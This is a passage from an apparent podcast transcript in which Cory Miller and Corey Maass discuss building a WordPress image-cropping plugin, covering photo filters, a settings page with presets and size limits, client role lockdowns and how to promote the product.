do any planning or do you jump right in?<br />I&#8217;m like, I a hundred percent jump right in, just like you, you keep saying like, there&#8217;s something<br />here. I often jump right in when I just, my gut [00:14:00] tells me that there&#8217;s something here<br />and, uh, Because I&#8217;m finding, and this is, I was noticing this again over the weekend. Um, the<br />setting screen that I wanna show you is like, I had to start building the setting screen in order for<br />me to go, oh, no, this setting isn&#8217;t right, or, we don&#8217;t need this, or This is better organized a<br />different way.<br />But I had to like, and I suppose I could put pen to paper and come to the sum of the same<br />conclusions, but for me, pen to paper is usually writing. You know, some, some aspect of code<br />to, so that I&#8217;m clicking on a button or I&#8217;m, I&#8217;m starting to fill in a screen or I&#8217;m even at this point, I<br />can just look at a screen and be like, no, this isn&#8217;t what we need, or this isn&#8217;t intuitive, or, um, no.<br />With that said, what I&#8217;ve designed is quite ugly. Um, I was futzing around. Information<br />architecture, and I don&#8217;t know why I was bothering, it was Sunday. I was having fun. Um, but<br />anyway, yeah, it&#8217;s, uh, there&#8217;s, [00:15:00] there&#8217;s definitely a difference of, of, for me anyway, like<br />getting in and actually clicking on things.<br />Cory Miller: It&#8217;s uh, when you say, when you said hobby, it reset me back to me going, is this,<br />should this really be a hobby for me? You know? Hmm. Um, cuz. I gotta tell you, I&#8217;ve, I<br />presented my business group about a week or two ago, and I was like, yeah, I don&#8217;t know. I<br />don&#8217;t know if I keep going. You know, back to middle age mediocrity, whatever it is, it&#8217;s like, I,<br />you know, we&#8217;re trying to do some things with post status and it&#8217;s been one frustration after the<br />other hitting walls.</p>\n\n\n\n<p>I think that&#8217;s starting to loosen up, maybe with my own growth, you know? Okay. But like, just<br />trying to make progress on stuff where I had a team previously and now we&#8217;re trying, you know,<br />put stuff together. But that&#8217;s the bigger business. But down product too is like, you know, I think<br />there was a hope in me that you launch it and everybody&#8217;s like, hell yes.[00:16:00]<br />You know? Yeah. There&#8217;s more to it, you know? I just wanted people to instantly love it.<br />Corey Maass: Well, and starting from scratch is freaking hard. I mean, you were, you were on<br />a, a winning team. You were, you know, you were on a, a bus with a group of people. You&#8217;d built<br />the bus. You got the bus moving, and then you were hurling down the highway successfully.<br />And it&#8217;s real easy to forget that, like, oh, right. When we were building the bus, nobody cared.<br />And when the bus, the wheels first started moving, nobody cared. Now they do. And so yeah, if<br />you are, you know, leveraging something, if you&#8217;re building a trailer onto a bus that&#8217;s already<br />moving, that&#8217;s different than getting off the bus, chilling for a couple of years and then starting to<br />build another bus, you know?<br />Weird, weird analogy, but ,<br />Cory Miller: no, no, no. I like the bus thing cuz that&#8217;s how it was. I was like, I. I don&#8217;t, I get credit,<br />but I try not to ever take it and [00:17:00] be sure to point it in other ways. Like it was very much<br />a band back to music. I like, this is like, we&#8217;re a band that makes great music together. You<br />know, somehow it&#8217;s working, you know?<br />Yeah. And I can&#8217;t really take credit for a lot of that. I was, don&#8217;t get me wrong, I contributed, I<br />impacted it, but it was a magic of. Yeah, things flying together with it. And I think I&#8217;ve been trying<br />to ree that magic, you know, particularly with product. Um, but the word that comes up for me,<br />and I&#8217;m curious what your thoughts about this are, like de detachment, detachment from my<br />brilliant ideas, Corey, like, man, I&#8217;m very attached to my brilliant ideas, you know, and like here I<br />go.<br />How to detach from that pride aspect and then go just kinda lean into like passion and interest,<br />which is what your pace and how you [00:18:00] approach This has been really healthy for me<br />because you&#8217;re kinda like, I&#8217;m having fun doing it today. I&#8217;m having it and then tomorrow having<br />fun doing it and it. It&#8217;s, it&#8217;s taking some box for you.<br />And I&#8217;m like, I need to be just okay with like, it&#8217;s taking a box for me. Now when I am working<br />with a developer partner, , I&#8217;m like, I wanna talk to you about filters. I wanna talk to you about all<br />these things. Cuz like I had, like all the stuff that we could do with images. I&#8217;ve been planning<br />around with stuff and wanting, been wanting to go like, you know, Instagram revolutionized<br />photos, for instance.<br />I think it, it took the iPhone or the smartphone, whatever it is, and made most anybody a pretty<br />decent photographer, right? Like, you know, Photoshop, you could do the Gazi blur and you can<br />kind of filter and like make things a little like correct stuff with Instagram. I did that and I&#8217;m like, I,<br />I love that.<br />I love taking photos. I&#8217;ve been taken. [00:19:00] So this is a weird sidebar onto the product by.<br />But I&#8217;ve been, um, you know, there&#8217;s those cartoon apps that&#8217;ll take a photo and make a cartoon<br />of it. Yep. I&#8217;m a freaking geek about cartoon illustration, all that stuff. So what I&#8217;ve been doing,<br />this is gonna lead back to product, by the way, an actual question on our product future.<br />And you can say, Hey, can we pause that? Can we hold that later? But, so I&#8217;ve been taking, I<br />love taking pictures of sunsets, you know, and I. So I&#8217;ve been taking my sunset pictures and<br />putting &#8217;em into my cartoon app. . Mm-hmm. nice. Yeah. And making these really things. But the<br />premise here was, you know, back to our philosophical conversations about images and the<br />web and on a website, and I go, you know, with ai, there&#8217;s a, that mix in there too, but I go, that&#8217;s<br />interesting to me.<br />Like for, for, for our product perspective is like, there&#8217;s cool things going on. I think we could be<br />creative and innovate downstream a bit in this [00:20:00] market. While I&#8217;m kinda like really<br />impatient, but trying to be patient about getting to the stage of like, I want somebody to pay for<br />it. I want somebody to give some validation to go, okay, should we put a little bit more time and<br />effort and money into this?<br />You know? Right. But anyway, the filtered conversation was where I&#8217;ve been going as we&#8217;ve<br />been talking, going man, You would know, but like are there libraries and stuff that we can do<br />filters or something different to make things just a little nicer in the pro side? Yeah, that I just<br />freaking love, like I&#8217;m such a geek Corey about that.</p>\n\n\n\n<p>But I take my picture and then I share it over to whatever the tune app is and I really like, I don&#8217;t<br />know, it&#8217;s kind of fun. There&#8217;s gotta be . I can&#8217;t help, this is my idealism. There&#8217;s gotta be<br />something. On this other side when we start being able to get to the pro side. Okay.<br />Corey Maass: Looking for the other, the other app, there&#8217;s one that, um, I got really into a<br />[00:21:00] couple years ago.<br />That&#8217;s, um, it&#8217;ll, it&#8217;ll take any photo and basically make it a painting Yes. In a bunch of different<br />styles. Yes. Because there was a, a woman at the la in the, uh, woman who posted on<br />Facebook this like really cute watercolor painting of a farmhouse. And then I noticed at the<br />bottom that there was a watermark of the app that she&#8217;d used.<br />And I was like, oh crap. She just took a picture of a farmhouse and ran it through this little, you<br />know, 99 cent app and then had. Like a watercolor that I would&#8217;ve put on the wall, you know?<br />Um,<br />Cory Miller: see that, that, that&#8217;s like the heart of publishing for me is expression, and I&#8217;m very<br />much an amateur photographer that flunk photography twice, by the way, in college. But I go,<br />Corey Maass: you forgot to do that. No, the, the cover, the lens cover off . Yes, yes.<br />Cory Miller: I know what depth to field is, but I&#8217;m like, The manual. Mm-hmm. cameras I had to<br />use suck. But all that to say [00:22:00] like this is interesting and that&#8217;s a hobby of mine and so I<br />would say it&#8217;s a hobby of mine. It&#8217;s taking these photos.<br />I even had my son do it while I was driving. I was like, could you take a picture of that sentence?<br />Yeah,<br />Corey Maass: yeah, I do. It&#8217;s one more thing. We have the same of, you need to look at my<br />Instagram. It&#8217;s literally just sky pictures. That&#8217;s<br />Cory Miller: so, okay. This is called Tune. But yeah, let&#8217;s see<br />Corey Maass: here. Oh, it does it live? It Does it live?<br />Oh, that&#8217;s cool. I assumed it was like, it had to be a photo, but it, it actually applies the filter while<br />you&#8217;re moving the photo.<br />Cory Miller: Yeah. So I was like, that&#8217;s wild. And then they&#8217;ve got impressionism, they&#8217;ve got all<br />these filters and I go, right, you know, there&#8217;s something about Instagram having, yeah, I, I don&#8217;t<br />know, 10, 15 filters.<br />I always use like the first six. Sure. You know, but it&#8217;s like there&#8217;s something about that taking<br />something, making it, just dressing it up a little bit and being able to put it out there. Like I&#8217;ve<br />been playing with the tune stuff on the colors cuz it really pulls [00:23:00] out some of the sunset<br />photos and stuff and I go, I hope there&#8217;s something there on this pro.<br />I want it. You know what I mean? Like I want something that just<br />Corey Maass: I conceptually, I think. You&#8217;re onto something. I mean, again, go, what&#8217;s our<br />mantra? You know, making creative tasks simpler, easier, fun. And so we&#8217;re starting with what<br />we&#8217;re hoping is the widest base. Everybody needs to crop an image and get it into WordPress.<br />Um, and then. So I, my Instagram, again, I&#8217;m fascinated, I&#8217;m captivated by mostly cloud shapes<br />and especially sunlight coming through the clouds. But I didn&#8217;t want to, I, I was never. Really<br />impressed with filters. Like they&#8217;re neat for doing different things, but I didn&#8217;t, they didn&#8217;t do what<br />I wanted. And so what I [00:24:00] actually do is, um, because I noticed that the, whatever it is,<br />the polarization from my sunglasses, Make things more distinct.<br />So I usually take my sunglasses off and then take a picture through the lens, and that&#8217;s my real<br />world filter, so to speak. Right. But it&#8217;s like, it&#8217;s, it&#8217;s my style. Nobody knows I&#8217;m doing it, but<br />that&#8217;s stylistically. Right. And so I imagine that, uh, a lot of people like. They, they have their feed<br />and so they have their favorite one or two filters and they think of it in part as their branding.<br />Um, and maybe it&#8217;s the same with blogs where it&#8217;s like, oh, if I&#8217;m, I&#8217;m blogging week over week,<br />whatever photo, I&#8217;m gonna give it the same treatment. Um, you know, even if that means, it&#8217;s not<br />necessarily some manipulation of the photo, but I put. My own watermark, or I put the title of the<br />blog post in a certain font with a certain background.<br />You know, [00:25:00] there&#8217;s a treatment so that you know when it&#8217;s shared. It&#8217;s the same with<br />the OG images, which is why I&#8217;m so fascinated by those. Um, and that&#8217;s the other plugin that I<br />keep messing around with as generating social images. But it&#8217;s the idea of being, again, that<br />same sort of the concept of set it and forget it, but so, Um, so the, another, another word that we<br />should somehow incorporate into one or another of our sort of overarching rules here is<br />consistency, which we&#8217;ve talked about.</p>\n\n\n\n<p>It&#8217;s like, but, but taking that, like all of your images should be 16, nine, but taking it much further<br />so that it&#8217;s all of your images should be watermarked the same way, or they should have some.<br />You know, coherent look and feel so that I land on any page on your blog and, and I know where<br />I am or if I see an image on, in, you know, I&#8217;m scrolling Twitter and I&#8217;m like, oh, there&#8217;s another<br />one of Corey&#8217;s photos.<br />Because it&#8217;s, it&#8217;s [00:26:00] a, it&#8217;s a sunset, but it&#8217;s got the, the comic book treatment, you know,<br />so whatever, whatever it is, like, um, I, I think you are, you&#8217;re, what I take away from what you&#8217;re<br />describing is, An example of still kind of what we, our long-term goal, like whatever the handling<br />of images, but allowing people to handle images consistently.<br />And if it&#8217;s, if it&#8217;s unrecognizable, if it&#8217;s just a task, if it, if we just make uploading images easier<br />than great, like, and we&#8217;re, and everybody has that problem, but if down the road, like, yeah, we<br />hear from people that they all want watermarks or they all want. Uh, you know, an image filter<br />and we can figure out how to do that.<br />It&#8217;s, it still, to me, falls in the same, the same ballpark. Yep.<br />Cory Miller: Now we need a business case, like, you know, take some of this [00:27:00]<br />abstract, creative thought and go, okay, how can we, back to what you kind of grounding us in<br />as like consistent, I heard the word consistent, consistent. unique to the brand Yeah. That<br />they&#8217;re trying to portray.<br />That&#8217;s really interesting thought cuz I, I love templates. I mean, obviously mm-hmm. , that&#8217;s the<br />it that&#8217;s High Themes came from Template. Template Monster. You know, I was a, I had used<br />Template Monster 2004 or five for a website, um, that wasn&#8217;t in WordPress. I don&#8217;t even know<br />what it was in. Um, and I.<br />Offering somebody some flavors to have a head start to, to create something creative. Like for,<br />for, for me, I can&#8217;t draw, you know, I doodle, but some kind of headstart to help somebody do the<br />things. Yep. Consistent you need to your brand, um, you, your [00:28:00] own kinda style that<br />you could develop. Um, kinda like paint by numbers, so.<br />Okay. Thanks for letting me die. Tribe on. Wonder and fascination about all this. Um, you<br />wanted to talk about settings?<br />Corey Maass: Yeah. So I just shared, uh, something with you. Um, you see my screen? Yeah, I<br />can. So starting a settings page. Um, so we&#8217;ve got, I don&#8217;t know if it&#8217;s working in this version yet,<br />so featured images, um, Oh yeah, I, I have a fix for this.<br />So you see the three, four is not actually three four. Um, so that I&#8217;ve, that&#8217;ll, that&#8217;ll be fixed in the<br />next version. A little thing that&#8217;s been bugging me. Um, but the, you know, we&#8217;ve, we&#8217;ve got the<br />actual cropper in a couple of places. Media ad new, no, it&#8217;s not in here. [00:29:00] Again, this is<br />just a non, a little local demo thing.<br />Um, but I started adding what we&#8217;d talked about previously. Uh, uh, the next thing we need, or<br />one of the next things we need is a settings page where we can define the, essentially the<br />defaults like we&#8217;re talking about. Um, So starting with one of the use cases or the, the place, the<br />implement, one of the implementations we&#8217;ve done, um, being featured images.<br />The idea being that right you, when you first install a plugin, we&#8217;ll walk you through these<br />essentially where, you know, okay, for featured images, what is, you know, you always want<br />your photo to be, or the resulting photo to be at least, you know, 500 wide, uh, you know, but not<br />more than 2000 wide. And then same with.<br />You know, something like this, right? So that you don&#8217;t, [00:30:00] you don&#8217;t end up with images<br />that are too small, but you don&#8217;t also don&#8217;t end up with images that are too large. Um, and then,<br />uh, presets,<br />Cory Miller: oh, you can remove. That&#8217;s cool.<br />Corey Maass: So, yeah, because it&#8217;s like, uh, the, the example of the featured image, right? It&#8217;s<br />like we have given you these six square circle, 16, 9 43.<br />but it&#8217;s like, you don&#8217;t, you don&#8217;t want to give you, you, you know, if, if your featured image<br />should always be a circle, then, then why do you have to select circle every time? Right. And so<br />in settings, yeah, you can go in and remove, um, you know, everything but the circle. Um, and<br />then save it. And then that&#8217;s the idea being that, you know, you hit save here and then the next<br />time you come into here where you&#8217;re setting your featured image circle would be the only thing<br />available.<br />Um, and obviously if there&#8217;s, if there&#8217;s only one, then it&#8217;ll be pre-selected and so then [00:31:00]<br />it saves you a step. Um, and then, and then there&#8217;s also the option of, um, so this isn&#8217;t quite</p>\n\n\n\n<p>functioning, but, um, Choose a preset. So it&#8217;s, if you, if you know, I&#8217;ve now deleted all of the, the<br />default preset 16 nine, you can re-add it here, or there&#8217;s this, you know, I, this just, this is my<br />preset, but it&#8217;s like you can, you can name it the query, uh, Miller preset with an aspect ratio of,<br />you know, whatever, whatever.<br />Um, I think this works. Yeah. There&#8217;s the Corey Miller preset. Um, awesome. So, so this is, this<br />is what I started with, um, again, with the idea that what you set is what&#8217;s gonna get translated<br />to here. So the presets are choose your shape, you then have those to choose from. Um, and<br />then when you cropped an [00:32:00] image, the output would match whatever your Minn Max<br />is.<br />Um, I haven&#8217;t quite, I&#8217;m not sure what. Parallel is yet, is it, is it always you? It should be the<br />minimum, but should it go up to the max? You know, we&#8217;ll figure that out. But, um, is, is this kind<br />of what you had in mind? Does this resonate with you? Anything missing?<br />Cory Miller: Um, now that the preset thing is really awesome, like being able to set that here, I<br />think that&#8217;s very forward thinking.<br />Work. You know, I continue to think through work, through flow, come in here, configure it<br />yourself, save it, make it easier on the client, and it becomes a pretty easy thing to, for the<br />problem of getting right sized images per the theme design. So I think that&#8217;s cool. Would you<br />scroll up a little bit? So this puts it, [00:33:00] this men stuff puts it where, Any image that goes<br />through it and scrub by it will not be bigger.<br />So that then whatever we&#8217;ve listed here.<br />Corey Maass: Okay. Yeah, the, you know, it&#8217;s like if you thinking about pr, you know, protecting<br />people from themselves. So if they upload a 10 pixel by 10 pixel emoji and they, but they want to<br />use that as a high res, uh, featured image, then it. Upscale it and look terrible, but that&#8217;s better<br />than them, than a 10 by 10 pixel image getting stuck in there.<br />And then same with like, what we keep talking about is uploading from your photo where, or<br />uploading from your phone where a photo is six megs. No, bring it down, you know, and, and,<br />and 4,000 pixels. It&#8217;s like, no, bring it down to the web. Really doesn&#8217;t need more than 2000<br />pixels. [00:34:00]<br />Cory Miller: So, okay, so the experience is come in here, set it here, put some guardrails.<br />Um, bumpers. Bumpers. Keep talking about bowling, bowling. Bowling bumpers. Okay. Then<br />when they go to do it from like, this is the basic settings. Start, you know, start hearing, get a<br />little bumpers, but then the workflow, if they&#8217;re going into the image and all that kind of stuff. Is<br />there a plan for. Letting them customize that in the featured image and the other, you know,<br />tools in the post.<br />That&#8217;s a good question because here&#8217;s what I&#8217;m thinking. Like web designer developer would<br />go, there&#8217;s your guardrails. Cool. You know? Yeah. And then they get into the live, and I think<br />maybe they, like we were doing the ratios to be simple. Click boom, there you go. But if<br />someone goes. You know, I don&#8217;t know.<br />I want [00:35:00] the cropped image, like I think we were talking about, there&#8217;s a featured image<br />section, then there&#8217;s another section which is in lieu of the block. Yeah. It&#8217;s like upload an image<br />and, and my question would be like, I think we should consider in that, that screen over there,<br />letting them do the custom dimensions there potentially.<br />Corey Maass: Mm. Yeah, so I, I think if I understand you, like we&#8217;ve got a, we&#8217;ve got a bypass,<br />which lets them upload. Straight from their hard drive. And then I also think, if I&#8217;m hearing you<br />correctly, we need a bypass, essentially, these settings. So it&#8217;s like you can still use the cropper,<br />but you can essentially make bad choices if you want to.<br />Uh, and I, and I think maybe that, like there&#8217;s a, I also envision a toggle in here that enables<br />that. And so there&#8217;d be like, here are the [00:36:00] guardrails, you know, a and maybe this<br />screen, so at least, at least for my use case, right? I am, I am an ad I, I have the WordPress<br />admin role. I have the WordPress role of administrator, and then all of my clients have a<br />contributor role, or I&#8217;ve made up another, um, another role called site admin.<br />And so they still think that they&#8217;re admins, but I&#8217;ve actually disabled a bunch of things so that<br />again, they can&#8217;t, they can&#8217;t go in and update a plugin that they shouldn&#8217;t or delete a plugin or<br />change themes. Have had clients go in and just be like, what does this do? And totally break a<br />site. . And so I think in, in, in here, there&#8217;s a, there&#8217;d be a, like an advanced toggle that says, lock<br />this shit down.</p>\n\n\n\n<p>Yeah. Or these are the recommended. Let them make bad choices if they want to. And so like<br />for my clients, for [00:37:00] featured images, hard, hard, hard rule, it&#8217;s 16 nine. Full stop, no<br />exceptions. And so I would switch that toggle to be like, do not let them make any other choices.<br />But you know, the o our other implementation, so this screen would essentially be repeated for<br />media library.<br />I haven&#8217;t reported it over yet, but in media library I might allow more presets. I also might toggle<br />it the other way and say, you know, let them. Upload something because frankly, like we also<br />use the media library for, um, you know, hosting an image to send to the press. And so we then<br />we want a high res image and we&#8217;re just basically using our WordPress install as file storage.<br />And so they would, they would hit a little button that says, just let me upload, you know, leave<br />me alone and let me upload the, the image or let me crop it, but leave it at 7,000 pixels or, or<br />whatever. So, yeah. [00:38:00] That&#8217;s another necessary.<br />Cory Miller: I think this is the work, this is the workflow for an organization or the developer<br />here in this screen.<br />Yeah. What I&#8217;m thinking is I go, okay, because we, the crux of the problem we started with<br />months ago was it&#8217;s a pain in the butt to like crop an image to make it reasonable for the web<br />and look good. And I, if I&#8217;m just Corey Blogger, Corey website thing, I go, okay, I&#8217;m writing a<br />post. I go, okay, I need an image.<br />I want an image for it in here and want it. Obviously I you won&#8217;t believe how many times I&#8217;ve like<br />gotten. A screenshot tool or something to go How many pixels wide is my Yeah. Post column<br />with, you know, and I, we&#8217;ve talked a lot about this, but I go, maybe I [00:39:00] want it really tall<br />in the, in the place or something like that doesn&#8217;t fit a preset mm-hmm.<br />you know, like, here&#8217;s the quick presets we&#8217;ve done. Just go here and you can kind of keep it<br />standard that checks that consistent box, but, Utility of the crop to make it whatever it needs to<br />be for that page design. Yeah, that&#8217;s the workflow I&#8217;m thinking about because I think this is<br />where we need to be for the, I&#8217;m handing this project over to you and I&#8217;m trying to keep you right<br />in the bumpers and I think that big time checks the agency box and some point I wanna share<br />that with our agency owner channel and just get some feedback and.<br />Understand the problems they actually face, but the other side is to make this ubiquitous and<br />easy to use. How do we make it really practical and easy for what they&#8217;re trying to do? And I&#8217;m<br />just talking that out, going, I wonder, you know, they find the image, [00:40:00] they upload it,<br />but they want it, you know, you know how it goes.<br />Sometimes the image doesn&#8217;t fit right. A, a ratio.<br />Corey Maass: So, yeah. Well, and yeah, and I think, you know, we. What we don&#8217;t want to do is<br />limit people&#8217;s creativity and so, you know, and what&#8217;s WordPress? Uh, The mantra, but I think it,<br />I think it&#8217;s actually backwards. They say decisions, not options or something like that.<br />But anyway, in, in our case, we actually want at least, at least sensible options. Um, you know,<br />or, or we don&#8217;t, we can&#8217;t speak for everybody, at least not yet . Um, and, and so yeah, letting<br />people. Bypass the, all these things. Um, I think if nothing else, you know, I mean more of the<br />spirit of WordPress and, and more, you know, the freedom to, to do what you want.<br />I mean, they can always disable the plugin. I&#8217;ve even done that with, there&#8217;s a plugin by short<br />[00:41:00] pixel that. It&#8217;s called something like resize after Upload. And so it, I installed that early<br />on so that client&#8217;s uploading it just lets you, uh, ju similar to some of this, right? It lets you set a<br />sensible limit, so it&#8217;s like resize anything over 2,500 pixels, down to 2,500 pixels.<br />And that&#8217;s all it does, but it&#8217;s it per it, it has saved us so much disk space. They will make a<br />mistake and upload something that&#8217;s, you know, two megs and 7,000 pixels or whatever. So,<br />um, but I&#8217;ve had to. Like, there were times when we wanted, uh, like we had a blog post that<br />was a web comic, and so we needed it 7,000 tall.<br />So I went in disabled, the plugin, and this is the process I had to do right as I went in. Had to go<br />in, disable the plugin, upload the full, full version, and then go back in and reenable the plugin.<br />So yeah, if there was a like click here to bypass just this one time, [00:42:00] uh, you know, then<br />it would&#8217;ve saved me.<br />Six clicks and a, and a bunch of load time. Um, so yeah, to, to make sure that we ac we<br />accommodate that or offer the option to accommodate that , uh, options to offer options always<br />gets a little meta, but I do think that that&#8217;s crucial as much because like we keep talking about,<br />we don&#8217;t, we just don&#8217;t know yet.</p>\n\n\n\n<p>We don&#8217;t know who&#8217;s really gonna use this. We don&#8217;t really know. And that&#8217;s, that&#8217;s why like, I<br />like the thinking. We did at the beginning of this phone call about using, talking about filters. But<br />to me, filters is an example or of, of that, which we don&#8217;t know yet, but are the kind of features<br />that we can offer.<br />Not fi filters specifically, but some sort of photo manipulation, assuming that that&#8217;s what people<br />want. But I also, I think I&#8217;ve, I mean, I&#8217;m having fun looking at discovering. How robust<br />JavaScript is [00:43:00] now and, and what it can do, including photo manipulation. But to me,<br />cropping a circle was a no-brainer for this, you know, for v1.<br />But adding photo filters is, is down the road at some point because it&#8217;s, it could be a lot of noise<br />within the product and if nobody wants it, then we don&#8217;t wanna add that much noise.<br />Cory Miller: I feel like too, a lot of this just kind of pulling up for the overall product journey we&#8217;re<br />on. Mm-hmm. is trying to find that spark.<br />Yeah. Like we&#8217;re talking through things that we think are good ideas, thought like really<br />thoughtfully trying to embody the experience and I feel like we&#8217;re trying to find a little spark of<br />something when we, when we talk about feedback and like, Someone goes, yeah, that what you<br />just said there, but like a lot of the process of product like this is trying to get just lucky and, and<br />find that little spark of, [00:44:00] hey, here it, here it goes.<br />You know? So it&#8217;s good for me to kind of reset and go, yeah, doesn&#8217;t feel good to see fewer than<br />10, you know? But like we&#8217;re trying to get it out there enough and we&#8217;re doing this obviously, so<br />we find a spark somewhere in there and they go, Hey, that&#8217;s what I. To, I don&#8217;t know, let&#8217;s, let me<br />throw in another sport.<br />Fishing,<br />We&#8217;re trying to fish and go like, yeah, we think this is good. So I&#8217;m trying not to make too many,<br />um, minute feedback things about the thing. I go. We, we, we decided a couple weeks ago, we<br />kept talking about like the custom dimensions. So you&#8217;ve done the settings page and now this<br />seems to be the other side.<br />And just kind of getting it out there and going, like, does this, does this work? Part of it, I think<br />for me is I&#8217;m not actively blogging as much at all, and I haven&#8217;t for a long time, but I need to get<br />back in the [00:45:00] process and start documenting, you know, when I&#8217;m Yeah. Trying to<br />express a. Feeling, emotion, whatever those things are.<br />Um, and then going through the press of like, what, you know, for me, I&#8217;m trying to commit to<br />this, this going, okay, let me find an image for this. That kind of hits at what I&#8217;m trying to get at,<br />you know? Yep. Um, back to Instagram, that&#8217;s what I loved about Instagram and those little<br />apps, you remember those apps that take like a second a day and it&#8217;d kind of be a journal and.<br />It started with an image and then it became, you know, people tried to blow up the content<br />underneath. Um, I needed to play around that with, in my head a little bit and practice it of like,<br />what if I started with an image and wrote and just put, get back doing my click and publish<br />again, and then note all my pain points with finding [00:46:00] images that are appropriate.<br />Corey Maass: And I&#8217;m going to, um, to me we&#8217;re, I like your fishing analogy. We&#8217;re fishing with<br />a, with a all lure. We&#8217;re still building. You know, we, we&#8217;ve got the hook and we&#8217;ve got the eyes,<br />but we need the little wiggly bit that the fish will actually be attracted to or whatever. Um, but I&#8217;m<br />not, I guess I&#8217;m, to me, I&#8217;m not yet casting with the intent of actually catching fish like I&#8217;m casting<br />to just kind of make sure that it, it all still holds together when it hits the water.<br />Um, I think with a, with some basic settings, uh, with a block at that point. Like I wanna start<br />promoting it a lot more, putting it on, you know, actually put it in some places. Um, I think at that,<br />that&#8217;s when, you know, we actually are version complete and we can start sending it to some<br />blogs. Um, You know, you, you do a, a Google search for word [00:47:00] plug, you know,<br />WordPress plugin, photo cropping or photo manipulation, and then go find all those listicles and<br />add some comments and, and basically just do kind of the, the, the bare minimum, uh, s e o and<br />spreading of the word.<br />I think the other thing is, um, I don&#8217;t remember who it was, um, Kathy. Or somebody. Yeah,<br />Kathy, um, typed in crop, uh, in the plug-in directory and. Um, and it was like, I think just crop,<br />we&#8217;re not even on the first page. If you do crop.express, we come right up, but crop space<br />express doesn&#8217;t come up. So we, you know, we need to start tweaking some of, you know,<br />looking at, cuz at that point, like the, the README that&#8217;s in there now is, is almost, is already<br />almost not.</p>\n\n\n\n<p>Accurate in that we&#8217;ve added more features. And so revisiting that, revisiting the wording,<br />starting to play with the [00:48:00] wording, but it&#8217;s like at that point we are at least a fully<br />functional product. And so then, then I feel much better about talking about it. I also look forward<br />to like, I will make my clients use this whether they like it or not, and I will toggle it so that they<br />are locked down.<br />Um, and then I will hear their complaints, you know, good, or, or I guess you don&#8217;t have good<br />complaints, but I will hear their feedback, good or bad. Um, but it&#8217;s, um, you know, to me a very<br />real world use case. So, um, we&#8217;re. I guess I&#8217;m trying to get us there, right? Like basic settings,<br />basic implementation. Um, and then I, I, and then frankly, like at that point, at we, we, we.<br />It&#8217;s fun to keep talking every week, but I almost feel like at least what I&#8217;ve done in the past is at<br />that point we, like, we let a couple of months go by and maybe we&#8217;re working on, we&#8217;re still<br />working on it [00:49:00] or we&#8217;re working on a companion or we&#8217;re, you know, something else is<br />cooking. But, um, The, you know, one of the best things that happened to me was, you know,<br />my social link pages plug in.<br />I built it and then, uh, had to stop working on it cuz of a job I was doing. And the year went by<br />and I stopped doing that job and I came back and was like, oh, it has a thousand active installs.<br />And it was like letting it grow organically. Mm. You know, letting time happen naturally. Like I<br />probably could have made that ramp happen a little bit faster, but not a lot, you know, at least at<br />the level I&#8217;m at.<br />Like we, like we talked about, if you&#8217;re starting from zero, you&#8217;ve only got so many favors you<br />can call in. You&#8217;ve only got so many eyes on you. You&#8217;ve only got, um, you know, I think we&#8217;ve,<br />we&#8217;ve both got a little bit of an, I, you&#8217;ve got a much bigger audience than I do. We both are<br />involved with communities, but you know, we are not, [00:50:00] Uh, who&#8217;s a successful<br />blogger?<br />Tim Ferris or, you know, Paul Jarvis or, um, Joel s Spolsky, or, you know, whoever, like big, big<br />names that have attention on them. And so we&#8217;ve, we&#8217;ve, there will be, there will come a day<br />when we&#8217;ve, we&#8217;ve basically tapped every lead that we can think of, and then it&#8217;s like, okay, so<br />let&#8217;s let a week go by and let some, you know, let the internet do its job and, and spreading the<br />word.<br />Cory Miller: That&#8217;s good grounding.<br />Corey Maass: It&#8217;s hard. It&#8217;s hard,<br />Cory Miller: like even if I want to, I, I&#8217;m always so impatient and want to accelerate and get to<br />the things, but I, that&#8217;s really good grounding.<br />Corey Maass: It&#8217;s like, well, if we, if we had a gajillion dollars, if, if we had investment, I&#8217;m not,<br />obviously, I&#8217;m not advocating that, but it&#8217;s like, If we were in that kind of situation or we were able<br />to, you know, sit down in an office day after day and say like, this is our job.<br />[00:51:00] Very different trajectory. Yeah, but I don&#8217;t, but we&#8217;re not in that position.<br />Cory Miller: Yeah, it&#8217;s true.<br />Okay. Well anyway, so go ahead.<br />Corey Maass: Oh, I was just gonna say like, we&#8217;ve got five minutes and I actually need to wrap<br />up on time today, so, okay. Um, just wanted to check in with you, see, see if there&#8217;s anything<br />else to talk about or what else you wanted to talk about. Put you on the spot here. I<br />Cory Miller: think that&#8217;s it. I want to keep kind of pushing in and trying to find, um, I think my<br />part in this is sniffing the problem that we go there.<br />It, you know, there it is. That could potentially illuminate it to bring in money for sales, whatever it<br />might be. But, um, and going like, I think we got a pretty cool thing here. It seems to me for the<br />future, it&#8217;s like [00:52:00] image creation in that cate, something in this category is the potential<br />for the pro. And I&#8217;m keen to just go, like, personally finding the angles in there that would go right<br />here.<br />This could be a little, this could be a V1 into the paid, you know, finding that, that little mix. But<br />thanks for keeping us on track with this. I, I think where we&#8217;re going with this setting is great. It&#8217;s<br />all there. It&#8217;s functional or it will be, and, uh, try to get a little bit more stepped in the, into the.<br />Finding our people<br />Corey Maass: Yeah. For this. Yeah. And I&#8217;m, I&#8217;m, you know, I don&#8217;t think I need to say it, but I&#8217;ll<br />say it anyway. Don&#8217;t get me wrong. Like, I&#8217;m also anxious and excited. Unfortunately, this week,<br />once again, life happens. And so I&#8217;ve, on Monday, a tight deadline Okay. With a day job. Um, but<br />I&#8217;m, but I&#8217;m, there&#8217;s something is going to shift [00:53:00] and I, I almost want to, uh, I wanna</p>\n\n\n\n<p>make sure we don&#8217;t keep having the same conversation week over week, , uh, both for the<br />people listening in, but of course for ourselves.<br />Cuz that that&#8217;s also when we&#8217;re like, okay, yeah, last week we said we were gonna do this, it&#8217;s<br />still not done. So I guess another week goes by, you know, and then, and then we get frustrated.<br />So, um, trying to chip away at it and. But I think, cuz I think something will shift once we<br />honestly look at our, what, at our initial offering crop express the plugin and say, okay, that&#8217;s in<br />the repo as as a complete fishing lure, , or whatever.<br />Um, you know, and, and, and people are using it. And we are using it cuz it actually like does<br />solve the problems that we&#8217;re talking about.<br />Cory Miller: Yeah. Yeah. I wrote down here too, when you said block earlier, uh, I&#8217;ll follow back</p>\n\n\n\n<p>up with Robbie [00:54:00] Umhmm. That&#8217;s right. We had the whole thing come back. Yeah. Mm-<br />hmm. . But it seems like I knew Block had some complexity, uh, you know, that we talked about,</p>\n\n\n\n<p>but I know you&#8217;re heavily embedded into the Beaver Builder community and used it prolifically.<br />And we got that contact with Robbie, so I&#8217;ll follow back up with him. Kathy was the other one.<br />And then I still need to ping the Elementor team. Um, cuz that could be a, you know, it feels like<br />we need that. Somebody going 